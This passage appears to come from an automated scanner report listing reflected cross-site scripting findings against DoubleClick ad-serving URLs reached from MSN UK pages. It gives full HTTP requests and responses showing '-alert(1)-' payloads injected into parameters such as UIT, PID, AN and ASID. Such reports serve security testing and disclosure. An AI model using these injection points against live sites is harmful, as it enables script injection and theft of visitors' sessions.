document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e.png";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081ada41"-alert(1)-"0e77f79419f&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/4080
...[SNIP]...

2.15. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1035a'-alert(1)-'0f70069ec78 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G1035a'-alert(1)-'0f70069ec78&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:13 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G1035a'-alert(1)-'0f70069ec78&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/2
...[SNIP]...

2.16. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85755"-alert(1)-"a3b4d6a09cc was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G85755"-alert(1)-"a3b4d6a09cc&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:08 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
6/300x250-home-free.png";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G85755"-alert(1)-"a3b4d6a09cc&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/2
...[SNIP]...

2.17. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d150"-alert(1)-"1af3a768ac2 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=1d150"-alert(1)-"1af3a768ac2 HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:14:04 GMT
Expires: Wed, 03 Aug 2011 13:14:04 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=1d150"-alert(1)-"1af3a768ac2http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Products/Home/HomeHo
...[SNIP]...

2.18. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf49'-alert(1)-'35eddab7d06 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=3bf49'-alert(1)-'35eddab7d06 HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:14:10 GMT
Expires: Wed, 03 Aug 2011 13:14:10 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=3bf49'-alert(1)-'35eddab7d06http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Products/Home/HomeHo
...[SNIP]...

2.19. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a62d'-alert(1)-'10725b25213 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!8a62d'-alert(1)-'10725b25213&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:12:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!8a62d'-alert(1)-'10725b25213&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66
...[SNIP]...

2.20. http://ad-emea.doubleclick.net/adj/N1881.msn/B5322276.44 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1881.msn/B5322276.44

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bdf6"-alert(1)-"e20e390bb3b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1881.msn/B5322276.44;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!2bdf6"-alert(1)-"e20e390bb3b&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=;ord=1898580505? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://money.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:12:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/s0.2mdn.net/2362466/300x250-home-free.png";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!2bdf6"-alert(1)-"e20e390bb3b&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66
...[SNIP]...

2.21. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b100"-alert(1)-"c812f1ccf3a was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=90028641b100"-alert(1)-"c812f1ccf3a&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6360
Date: Wed, 03 Aug 2011 13:13:02 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
t/2285348/Backup_300x250_3.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=90028641b100"-alert(1)-"c812f1ccf3a&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-
...[SNIP]...

2.22. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dcb7'-alert(1)-'a3cc98cbbe4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=90028646dcb7'-alert(1)-'a3cc98cbbe4&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6356
Date: Wed, 03 Aug 2011 13:13:07 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=90028646dcb7'-alert(1)-'a3cc98cbbe4&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-
...[SNIP]...

2.23. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2ad1"-alert(1)-"9a23308a41e was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345d2ad1"-alert(1)-"9a23308a41e&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6356
Date: Wed, 03 Aug 2011 13:13:33 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345d2ad1"-alert(1)-"9a23308a41e&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399099/1%3B%3B%7
...[SNIP]...

2.24. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b81a'-alert(1)-'8f6882adeee was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=7062843456b81a'-alert(1)-'8f6882adeee&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6360
Date: Wed, 03 Aug 2011 13:13:38 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=7062843456b81a'-alert(1)-'8f6882adeee&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7
...[SNIP]...

2.25. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5714b"-alert(1)-"7ab23438929 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e095714b"-alert(1)-"7ab23438929&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6360
Date: Wed, 03 Aug 2011 13:13:54 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e095714b"-alert(1)-"7ab23438929&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaig
...[SNIP]...

2.26. http://ad-emea.doubleclick.net/adj/N2121.MSN.caratintuk/B5723452.3 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N2121.MSN.caratintuk/B5723452.3

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d409'-alert(1)-'ae76b5e7e5a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2121.MSN.caratintuk/B5723452.3;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e093d409'-alert(1)-'ae76b5e7e5a&destination=;ord=706284345? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://him.uk.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6360
Date: Wed, 03 Aug 2011 13:13:59 GMT

